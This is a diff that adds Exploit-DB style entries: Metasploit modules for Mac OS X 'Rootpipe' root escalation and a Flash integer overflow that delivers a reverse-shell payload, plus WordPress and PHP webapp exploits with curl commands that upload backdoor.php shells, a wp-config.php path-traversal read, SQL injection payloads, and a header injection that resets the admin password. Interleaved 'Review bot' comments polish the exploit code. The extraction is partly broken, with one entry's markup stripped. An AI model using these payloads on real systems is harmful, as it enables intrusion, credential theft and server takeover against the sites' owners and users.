+ " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
+ " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
+ "\n"
+ " - If possible, discard this server!\n\n"
+ " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )
+elif mapResult.values().count(505) == 0:
+ print ( GREEN+ "\n\n * Results: \n"
+ " The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)
+
+# infos
+print (ENDC+" * Info: review, suggestions, updates, etc: \n"
+ " https://github.com/joaomatosf/jexboss\n"
+ " joaomatosf@gmail.com\n")
+
+print ENDC
+
diff --git a/platforms/osx/local/36745.rb b/platforms/osx/local/36745.rb
new file mode 100755
index 000000000..09fad22cf
--- /dev/null
+++ b/platforms/osx/local/36745.rb
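Review bot: `getHost` calls `tokens.split(":")` on its else branch, but `tokens` is the list returned by `url.split("://")`, so a scheme-less URL raises AttributeError instead of yielding the host; it should read `return tokens[0].split(":")[0]` (the main script's `checkArgs` prefixes `http://` first, so the branch is only reached from other callers). `clear()` has the same kind of slip: `os.name == ('ce', 'nt', 'dos')` compares a string to a tuple and is always false, so the `cls` branch never runs — `os.name in ('ce', 'nt', 'dos')` is what was meant. In `exploitJMXInvokerFileRepository` and `exploitWebConsoleInvoker`, `conn.close` without parentheses is a bare attribute access, so those connections are left open until garbage collection; write `conn.close()`. The hand-rolled `getHost`/`getProtocol`/`getPort` trio would be better served by the stdlib `urlparse` module, since `getPort`'s `url[6:].split(":")` also mis-parses any URL that carries a path after the port.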
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+ Rank = GreatRanking
+
+ include Msf::Post::OSX::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Mac OS X "Rootpipe" Privilege Escalation',
+ 'Description' => %q{
+ This module exploits a hidden backdoor API in Apple's Admin framework on
+ Mac OS X to escalate privileges to root. Dubbed "Rootpipe."
+
+ Tested on Yosemite 10.10.2 and should work on previous versions.
+
+ The patch for this issue was not backported to older releases.
+
+ Note: you must run this exploit as an admin user to escalate to root.
+ },
+ 'Author' => [
+ 'Emil Kvarnhammar', # Vulnerability discovery and PoC
+ 'joev', # Copy/paste monkey
+ 'wvu' # Meta copy/paste monkey
+ ],
+ 'References' => [
+ ['CVE', '2015-1130'],
+ ['OSVDB', '114114'],
+ ['EDB', '36692'],
+ ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
+ ],
+ 'DisclosureDate' => 'Apr 9 2015',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'SessionTypes' => ['shell'],
+ 'Targets' => [
+ ['Mac OS X 10.9-10.10.2', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
+ 'CMD' => '/bin/zsh'
+ }
+ ))
+
+ register_options([
+ OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python']),
+ OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+ ])
+ end
+
+ def check
+ (ver? && admin?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ print_status("Writing exploit to `#{exploit_file}'")
+ write_file(exploit_file, python_exploit)
+ register_file_for_cleanup(exploit_file)
+
+ print_status("Writing payload to `#{payload_file}'")
+ write_file(payload_file, binary_payload)
+ register_file_for_cleanup(payload_file)
+
+ print_status('Executing exploit...')
+ cmd_exec(sploit)
+ print_status('Executing payload...')
+ cmd_exec(payload_file)
+ end
+
+ def ver?
+ Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+ Gem::Version.new('10.9'), Gem::Version.new('10.10.2')
+ )
+ end
+
+ def admin?
+ cmd_exec('groups | grep -wq admin && echo true') == 'true'
+ end
+
+ def sploit
+ "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
+ end
+
+ def python_exploit
+ File.read(File.join(
+ Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'
+ ))
+ end
+
+ def binary_payload
+ Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+ end
+
+ def exploit_file
+ @exploit_file ||=
+ "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+ end
+
+ def payload_file
+ @payload_file ||=
+ "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/36611.txt b/platforms/php/webapps/36611.txt
new file mode 100755
index 000000000..fb519b07e
--- /dev/null
+++ b/platforms/php/webapps/36611.txt
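Review bot: `check` lets an exception escape instead of returning a check code: `ver?` passes `get_sysinfo['ProductVersion']` straight to `Gem::Version.new`, which raises `ArgumentError` on a malformed version string, so an unexpected sysinfo result aborts `check` rather than yielding `Exploit::CheckCode::Unknown`; a `rescue ArgumentError` returning `Exploit::CheckCode::Unknown` around the `ver?` call would keep the contract. The description's `Note: you must run this exploit as an admin user` could add that `check` enforces this through `admin?`, so a `Safe` result on a non-admin session is understood as a privilege condition rather than a missing patch. `exploit` also discards the output of `cmd_exec(sploit)`, so a failed Python stage is invisible before the payload is run; surfacing it with `vprint_status` is cheap (hedged, since exploit.py's output is not shown in this diff).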
@@ -0,0 +1,56 @@ +# Exploit Title: Wordpress SimpleCart Theme File Upload and Execution +# Google Dork: inurl:/wp-content/themes/simplecart +# Date: 31 March 2015 +# Exploit Author: Divya +# Vendor Homepage: https://github.com/UpThemes/ +# Software Link: https://github.com/UpThemes/SimpleCart-Theme +# Version: 2.1.2 +# Tested on: Windows, Linux +# CVE : None +# +# Other Themes: +# Micro Theme 1.0.3: https://github.com/UpThemes/Micro-Theme +# Holding Pattern Theme 1.3: https://github.com/UpThemes/Holding-Pattern-Theme +# Gallery Pro Theme 2.5.3: https://github.com/UpThemes/Gallery-Pro-Theme/ +# Evo Theme 1.3: https://github.com/UpThemes/Evo-Theme +# Charity Theme 1.1.3: https://github.com/UpThemes/Charity-Theme/ + + + +WP Theme Exploit + + + + + +
+ Target IP: + HTTP  + HTTPS 
+ Upload File:
+ Upload Path:

+
+ Base64 Encoded value (without double quotes) + 1. "Li4vLi4vLi4vLi4v" for website root directory upload.
+ 2. "Lg==" for current directory upload.
+

+ Vulnerable File:

+ +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/36640.txt b/platforms/php/webapps/36640.txt new file mode 100755 index 000000000..89e628a4c --- /dev/null +++ b/platforms/php/webapps/36640.txt 
@@ -0,0 +1,64 @@
+######################
+
+# Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
+
+# Exploit Author : Claudio Viviani
+
+
+# Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip
+
+# Date : 2015-03-14
+
+# Tested on : Linux BackBox 4.0 / curl 7.35.0
+
+######################
+
+# Description:
+
+Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts.
+Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.
+This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.
+
+######################
+
+# Location :
+
+http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
+
+
+######################
+
+# PoC:
+
+ curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
+
+# Backdoor Location:
+
+ http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php
+
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2015-03-14: Discovered vulnerability
+2015-04-03: Vendor Notification
+2015-04-03: Vendor Response/Feedback
+2015-04-04: Vendor Fix/Patch (2.5.3)
+2014-04-04: Public Disclosure
+
+#####################
+
+Discovered By : Claudio Viviani
+ http://www.homelab.it
+ http://ffhd.homelab.it (Free Fuzzy Hashes Database)
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################
diff --git a/platforms/php/webapps/36641.txt b/platforms/php/webapps/36641.txt
new file mode 100755
index 000000000..6e7196724
--- /dev/null
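Review bot: The last timeline entry `2014-04-04: Public Disclosure` predates every other date in the advisory (discovery is `2015-03-14`), so the year is presumably a typo for `2015-04-04`. The timeline is also the only place the fixed release appears; a `# Fixed in : 2.5.3` line next to `# Software Link` would give defenders the remediation target without reading to the bottom.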
+++ b/platforms/php/webapps/36641.txt 
@@ -0,0 +1,47 @@
+# Exploit Title: *u-Auctions Multiple Vulnerabilities*
+# Google Dork: "*Powered by u-Auctions** ©*"
+# Date: *03 April 2015*
+# Exploit Author: *Don*
+# Vendor Homepage: https://www.*u-auctions.com */
+# Version: *ALL*
+# Tested on: *Debian*
+
+*1. Blind SQL injection*:
+
+This vulnerability affects */adsearch.php*
+URL encoded POST input *category* was set to
+*(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/*
+
+*POC:*
+
+*http://www .targetsite.com
+/adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102*
+
+*Done*
+*+-------------------------------------------------------------------------------------------------------------------------------------+*
+*2. HTTP parameter pollution*
+This vulnerability affects /*feedback.php*
+
+URL encoded GET input *id* was set to *1&n903553=v972172*
+Parameter precedence: *last occurrence*
+Affected parameter: *user_id=1*
+
+The impact depends on the affected web application.
+*An attacker could*:
+*1* = Override existing hardcoded HTTP parameters
+*2* = Modify the application behaviors
+*3* = Access and, potentially exploit, uncontrollable variables
+*4* = Bypass input validation checkpoints and WAFs rules
+
+POC:
+
+*http://www .targetsite.com
+/feedback.php?faction=show&id=1%26n903553%3dv972172*
+*Done*
+*+-------------------------------------------------------------------------------------------------------------------------------------+*
+*There is XSS too but I don't see it useful for anything, so will skip it.*
+*Cheers folks, Don (Balcan Crew) is back! :)*
+*Have fun and have friends!*
+*Shouts to my good friends from past / whoever is online / this website and
+new kids from the localhost.*
+*~Don 2015*
diff --git a/platforms/php/webapps/36691.txt b/platforms/php/webapps/36691.txt
new file mode 100755
index 000000000..ae30d22e8
--- /dev/null
+++ b/platforms/php/webapps/36691.txt
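Review bot: The header gives `# Version: *ALL*` with no vendor-notification date or fix entry, so a reader cannot tell whether any release addresses the `adsearch.php` `category` injection or the `feedback.php` parameter handling; a disclosure timeline or an explicit `Fixed in:` / `unpatched` line belongs in the header. The HTTP parameter pollution section reproduces generic scanner boilerplate (`*1* = Override existing hardcoded HTTP parameters` ...) rather than what `feedback.php` actually does with the duplicated `id`, so the stated impact is unsubstantiated as written.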
@@ -0,0 +1,48 @@
+##################################################################################################
+#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility
+#Author : Manish Kishan Tanwar AKA error1046
+#Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
+#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
+#Date : 9/04/2015
+#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
+#Discovered At : Indishell Lab
+##################################################################################################
+
+////////////////////////
+/// Overview:
+////////////////////////
+
+file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server
+and hence vulnerable to arbitrary file upload
+
+////////////////
+/// POC ////
+///////////////
+
+
+Uploading PHP shell
+=================================
+Just open uploader.php in plugin directory
+http://target.com/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php
+browse your php shell and submit it.
+after uploading, you will get your shell in uploads directory at following location
+
+http://target.com/wp-content/uploads/i-dump-uploads/
+
+demo:-
+http://127.0.0.1/wordpress/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php
+and upload your shell
+
+
+ --==[[ Greetz To ]]==--
+############################################################################################
+#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
+#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
+#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
+#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
+#############################################################################################
+ --==[[Love to]]==--
+# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
+#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
+ --==[[ Special Fuck goes to ]]==--
+ <3 suriya Cyber Tyson <3
\ No newline at end of file
diff --git a/platforms/php/webapps/36733.txt b/platforms/php/webapps/36733.txt
new file mode 100755
index 000000000..00536647c
--- /dev/null
+++ b/platforms/php/webapps/36733.txt
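Review bot: The header has no `#Version` line; the download link names release 1.8, but nothing states whether later releases add the missing extension check in `uploader.php`, and no vendor-notification or fix date is given. Add `#Version : 1.8` beside `#Download Link` and a disclosure/fix status so defenders know whether updating is a remediation or the plugin should be removed.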
@@ -0,0 +1,18 @@
+# Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
+# Date: April 11, 2015
+# Exploit Author: @LookHin (Khwanchai Kaewyos)
+# Google Dork: inurl:?fdx_switcher=mobile
+# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/
+# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip
+# Version: WP Mobile Edition Version 2.2.7
+
+- Overview:
+Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php'
+
+- Search on Google
+inurl:?fdx_switcher=mobile
+
+- POC
+Exploit view source code wp-config.php
+http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
+
diff --git a/platforms/php/webapps/36735.txt b/platforms/php/webapps/36735.txt
new file mode 100755
index 000000000..016388461
--- /dev/null
+++ b/platforms/php/webapps/36735.txt
@@ -0,0 +1,90 @@
+?######################
+
+# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
+
+# Exploit Author : Claudio Viviani
+
+# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
+
+# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
+
+# Date : 2015-04-08
+
+# Tested on : Linux / Mozilla Firefox
+
+######################
+
+# Description
+
+ Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
+
+
+ Location file: /view/actions.php
+
+ This is the bugged ajax functions wp_ajax_duplicator_package_delete:
+
+ function duplicator_package_delete() {
+
+ DUP_Util::CheckPermissions('export');
+
+ try {
+ global $wpdb;
+ $json = array();
+ $post = stripslashes_deep($_POST);
+ $tblName = $wpdb->prefix . 'duplicator_packages';
+ $postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
+ $list = explode(",", $postIDs);
+ $delCount = 0;
+
+ if ($postIDs != null) {
+
+ foreach ($list as $id) {
+ $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
+ if ($getResult) {
+ $row = $getResult[0];
+ $nameHash = "{$row['name']}_{$row['hash']}";
+ $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
+ if ($delResult != 0) {
+
+
+ $post['duplicator_delid'] variable is not sanitized
+
+ A authorized user with "export" permission or a remote unauthenticated attacker could
+ use this vulnerability to execute arbitrary SQL queries on the victim
+ WordPress web site by enticing an authenticated admin (CSRF)
+
+
+######################
+
+# PoC
+
+ http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
+
+ POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)
+
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2015-04-08: Discovered vulnerability
+2015-04-08: Vendor Notification
+2015-04-09: Vendor Response/Feedback
+2015-04-10: Vendor Send Fix/Patch
+2015-04-10: Public Disclosure
+
+#######################
+
+Discovered By : Claudio Viviani
+ http://www.homelab.it
+ http://ffhd.homelab.it (Free Fuzzy Hashes Database)
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################
diff --git a/platforms/php/webapps/36736.txt b/platforms/php/webapps/36736.txt
new file mode 100755
index 000000000..3d40cde91
--- /dev/null
+++ b/platforms/php/webapps/36736.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Traidnt Up v3.0 SQL Injection
+# Google Dork: "Powered by TRAIDNT UP Version 3.0"
+# Date: 10-04-2015
+# Exploit Author: Ali Sami (ali.albakara@outlook.com)
+# Vendor Homepage: http://traidnt.net
+# Software Link: http://www.traidnt.net/vb/attachments/519880d1285278011-traidnt-up-v3.0.zip
+# Version: 3.0
+
+######### Vulnerable Code ############
+File: classUserdb.php
+ protected function doUpdateLastActive($username)
+ {
+
+ $this->_db->query("UPDATE `users` SET `lastactive` = '" . NOWTIME . "' WHERE `name` = '$username' LIMIT 1 ;");
+ $sql = "UPDATE `users` SET `lastip` = '" . $this->getIpAddr() . "' WHERE `name` = '$username' LIMIT 1 ;";
+ echo $sql;
+ $this->_db->query($sql);
+
+ }
+
+ private function getIpAddr()
+ {
+ if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+ $ip = $_SERVER['HTTP_CLIENT_IP'];
+ } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+ $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+ } else {
+ $ip = $_SERVER['REMOTE_ADDR'];
+ }
+ return $ip;
+ }
+######################################
+
+########## Explanation ###############
+getIpAddr function prioritizes untrusted user input entry (HTTP_CLIENT_IP & HTTP_X_FORWARDED_FOR) over the trusted one (REMOTE_ADDR) and does not sanitization
+######################################
+
+########## Proof-of-concept ##########
+1. Register an account at the upload center
+2. Send a request that consists of an extra header (CLIENT-IP) which must contain the intended SQL to cp.php
+#######################################
+
+########## Request Example ###########
+GET /up/cp.php HTTP/1.1
+Accept-Encoding: gzip, deflate, sdch
+Accept-Language: en-US,en;q=0.8,ar;q=0.6
+Cookie: PREF=ID=3a12b65d918b5ae2:U=45f515bf65b09574:FF=4:LD=en:TM=1427718041:LM=1428079570:GM=1:S=fKvs0s67_JroY23b; SID=DQAAABYBAAAXBPxKBeMSz09m3xCH23suPwacDFc9z5ZTI1ryFZK7qYLbSIB4zQXOmaYpafjcxlh6qaAHy-rPNZOPYjnLa-pW4Xly4-XIfNze1b1HCtrbf5Nm5pBrxOdoyeKsjg0-CvszxYHXgkzN7JcJc-1ujf4fHrEZNoSR9k_f2Qm7WX3mXd-8z_guk36_sve2sHN2_d7eeT_e5IQl43NcT5ID_YMNPXQPADss_k0kOraKLeZn7kUs3wox8ZanbvgMSM9O8lQ5oaP7CmtioaFpts1Aunqk43teWMS35YAP6_d9i65Sx32NJoCqGQpMs2pQiMvbxm10DlBixFJuwW1AitFrblnTUg06mgzqTzPLoPVJ_KlHRbeBys_VyJxnmUx1IrwQJzk; HSID=AQJUEVtf4qu2U_FTd; SSID=AN_8N-KoCnT18Clw5; APISID=IqdO-J-4tT4AtOR8/AQp8y6Nd19D86imDx; SAPISID=MMGr9eZKdxn4QieS/Ak36TdFaTbAMrcFGl; S=videobuying=MntGlNA3nRzvbhbjINLRMw; NID=67=TabAC6lMzTQywxlSyMcuCfGN3PSOxY0X3VV0jglmXfVhTEGrkhWyrhTxLDOUytsOKlLuRHJhAatM2tSk5BiAweIssYjppGFH3zGLklwMBFqMwZqlxEQANw-qJwh2Jri6G7fL68NA2PyDT6dPNc9iY_zPfNtQ4jQEHq0Rqio7vRYs_1aPsPWp_mzoWs9lZPps_dmCRWv76C6WvGdw8ZruV86ojr77-qIkjnpVQKAhH5aRDCTGNKFRZ5LIRZXOhw
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
+X-Client-Data: CJK2yQEIpbbJAQiptskB
+Client-IP: 127.0.0.1', name='admin', password=md5('123') WHERE id = 1--
+
+** This request will update the administrator's username to (admin) and password to (123)
+######################################
+
+
diff --git a/platforms/php/webapps/36738.txt b/platforms/php/webapps/36738.txt
new file mode 100755
index 000000000..00ea783c6
--- /dev/null
+++ b/platforms/php/webapps/36738.txt
@@ -0,0 +1,55 @@
+######################
+
+# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
+
+# Exploit Author : Claudio Viviani
+
+
+# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
+
+# Date : 2015-04-1
+
+# Dork Google: index of website-contact-form-with-file-upload
+ index of /uploads/contact_files/
+
+# Tested on : Linux BackBox 4.0 / curl 7.35.0
+
+#####################
+
+# Info :
+
+ The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
+
+
+######################
+
+# PoC:
+
+ curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
+
+
+ Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
+
+
+######################
+
+# Backdoor Location:
+
+ http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
+
+
+#####################
+
+Discovered By : Claudio Viviani
+ http://www.homelab.it
+ http://ffhd.homelab.it (Free Fuzzy Hashes Database)
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################
\ No newline at end of file
diff --git a/platforms/windows/remote/36744.rb b/platforms/windows/remote/36744.rb
new file mode 100755
index 000000000..92b420e05
--- /dev/null
+++ b/platforms/windows/remote/36744.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player casi32 Integer Overflow',
+ 'Description' => %q{
+ This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in
+ the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as
+ domainMemory for the current application domain. This module has been tested successfully
+ on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'bilou', # Vulnerability discovery
+ 'juan vazquez' # msf module
+ ],
+ 'References' =>
+ [
+ ['ZDI', '14-365'],
+ ['CVE', '2014-0569'],
+ ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],
+ ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => OperatingSystems::Match::WINDOWS_7,
+ :ua_name => Msf::HttpClients::IE,
+ :flash => lambda { |ver| ver =~ /^15\./ && ver == '15.0.0.167' },
+ :arch => ARCH_X86
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 14 2014',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ print_status('Sending HTML...')
+ send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+ end
+
+ def exploit_template(cli, target_info)
+ swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+ target_payload = get_payload(cli, target_info)
+ psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+ b64_payload = Rex::Text.encode_base64(psh_payload)
+
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+ end
+
+ def create_swf
+ path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')
+ swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+ swf
+ end
+
+end
\ No newline at end of file
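Review bot: In `create_swf` the inner `swf = f.read` assignment is redundant, because `::File.open` with a block already returns the block's value into the outer `swf`; `swf = ::File.binread(path)` reads the same bytes in one step without the shadowing local. The `:flash` requirement `ver =~ /^15\./ && ver == '15.0.0.167'` is likewise fully decided by the equality test, so the regex is dead code; either drop it, or if the whole 15.x branch is meant to be accepted, say so in the Description instead. As rendered here the `%Q|...|` template in `exploit_template` holds only blank lines, presumably because markup was stripped during extraction; if the committed file really is empty there, `swf_random` and `b64_payload` are computed but never referenced by the template.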